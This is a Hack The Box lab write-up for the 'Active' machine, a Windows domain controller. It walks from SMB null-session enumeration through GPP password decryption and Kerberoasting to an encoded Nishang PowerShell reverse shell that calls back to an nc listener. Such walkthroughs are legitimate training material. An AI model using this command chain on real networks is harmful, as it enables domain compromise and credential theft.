🪴 Quartz 4.0

HTB - Active

May 04, 20264 min read

Target IP: 10.129.6.198 Domain: active.htb DC Hostname: DC.active.htb OS: Windows Server 2008 R2 (Domain Controller) Difficulty: Easy Author: [g1nt0n1c]

1. Phase 1: Reconnaissance & Information Gathering

1.1 TCP Port Discovery

We initiate an all-ports scan to map the attack surface of the Domain Controller.

# Scan all ports with a high minimum packet rate for speed
nmap -Pn -p- --min-rate 10000 10.129.6.198

Port Analysis & Mapping

  • 53/tcp (DNS): Microsoft DNS 6.1.7601 (Windows Server 2008 R2 SP1).
  • 88/tcp (Kerberos): Windows Kerberos architecture identified.
  • 139/445/tcp (SMB): Message signing is enabled and required.
  • 389/3268/tcp (LDAP): Active Directory LDAP indicating domain active.htb.

1.2 SMB Enumeration

Running Netexec against SMB confirms the exact OS build and reveals a critical misconfiguration: Null Auth: True.

nxc smb 10.129.6.198
# Output: Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (Null Auth:True)
 
# Leverage the Null session to enumerate readable shares
nxc smb 10.129.6.198 -u '' -p '' --shares
SMB         10.129.6.198    445    DC               Share           Permissions     Remark
SMB         10.129.6.198    445    DC               -----           -----------     ------
SMB         10.129.6.198    445    DC               ADMIN$                          Remote Admin
SMB         10.129.6.198    445    DC               C$                              Default share
SMB         10.129.6.198    445    DC               IPC$                            Remote IPC
SMB         10.129.6.198    445    DC               NETLOGON                        Logon server share 
SMB         10.129.6.198    445    DC               Replication     READ            
SMB         10.129.6.198    445    DC               SYSVOL                          Logon server share 
SMB         10.129.6.198    445    DC               Users

2. Phase 2: Vulnerability Analysis & Initial Access

2.1 Exploring the Replication Share

Using smbclient, we connect to the readable Replication share and recursively download its contents for offline inspection.

# Connect with a null session (-N can also be used)
smbclient //10.129.6.198/Replication
prompt off
recurse on
mget *

2.2 GPP Password Extraction (CVE-2014-1812)

Given the older OS (Server 2008), we check the downloaded SYSVOL policies for Group Policy Preferences (GPP) credentials.

# Search recursively for the string "pass" in the downloaded XML files
grep -rn "pass" .
# Found in Groups.xml: cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

Microsoft accidentally published the static AES key used to encrypt these passwords. We can use the built-in Kali tool gpp-decrypt to recover the plaintext.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
# Decrypted Password: GPPstillStandingStrong2k18

2.3 Validating Credentials

We verify that the discovered credentials map to a valid, active user account (SVC_TGS).

nxc smb 10.129.6.198 -u SVC_TGS -p "GPPstillStandingStrong2k18"
# [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18

3. Phase 3: Privilege Escalation (Kerberoasting)

3.1 Extracting Service Tickets

With a valid domain account, we query LDAP for user accounts associated with Service Principal Names (SPNs) to perform a Kerberoasting attack.

nxc ldap 10.129.6.198 -u SVC_TGS -p "GPPstillStandingStrong2k18" --kerberoasting kerberoasting.hash
# Extracts a vulnerable TGS ticket for the 'Administrator' account.

3.2 Hash Cracking

We use Hashcat against the exported TGS ticket to crack the service account password.

# Mode 13100 (Kerberos 5, etype 23, TGS-REP) or 13000 depending on extraction format
hashcat -m 13000 kerberoasting.hash /usr/share/wordlists/rockyou.txt
# Cracked Password: Ticketmaster1968

4. Phase 4: Domain Escalation & Execution

4.1 Validating Administrator Access

Before dropping a shell, we confirm our newly cracked Administrator password works against LDAP/SMB.

nxc ldap 10.129.6.198 -u administrator -p "Ticketmaster1968"
# [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)

4.2 Establishing a Reverse Shell

Manual shells via WMI are more stable. We will convert Nishang’s TCP One-Liner into an encoded PowerShell payload.

# Copy Nishang payload and convert to UTF-16LE Base64 blob
cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 . 
cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t UTF-16LE | base64 -w0
# Output: JABjAGwAaQ...bABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQAKAA==

Set up the local listener and execute the payload via Netexec.

# Terminal 1: Start Listener
rlwrap nc -lvnp 4444
 
# Terminal 2: Execute Exploit via WMI
nxc smb 10.129.6.198 -u administrator -p "Ticketmaster1968" -X "powershell -enc JABjAGwAaQ...=="

4.3 Shell Verification

Check the listener to confirm the system-level reverse connection.

connect to [10.10.14.230] from (UNKNOWN) [10.129.6.198] 49370
 
whoami
# PS C:\> active\administrator

New things learnt

nxc has a —kerberoasting module which speeds up the process nishang has a good Powershell oneliner Need to convert powershell revshells to make it readable iconv -t UTF-16LE | base64 -w0

Checklist added

kerberoasting

Graph View

Backlinks